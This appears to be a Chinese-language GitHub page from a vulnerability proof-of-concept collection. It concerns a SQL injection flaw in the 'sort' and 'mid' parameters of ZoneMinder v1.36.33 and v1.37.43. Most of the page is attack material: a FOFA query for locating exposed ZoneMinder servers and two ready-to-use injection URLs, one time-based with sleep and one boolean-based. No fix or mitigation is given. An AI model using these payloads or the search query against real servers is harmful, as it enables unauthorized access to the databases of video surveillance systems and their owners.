Skip to content

Latest commit

 

History

History
25 lines (16 loc) · 647 Bytes

ZoneMinder系统sort接口存在SQL注入漏洞.md

File metadata and controls

25 lines (16 loc) · 647 Bytes

ZoneMinder系统sort接口存在SQL注入漏洞

Zoneminder v1.36.33 和 v1.37.43 受到 SQL 注入漏洞的影响。

fofa

app="ZoneMinder"

poc

http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
http://host:port/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request

image

漏洞来源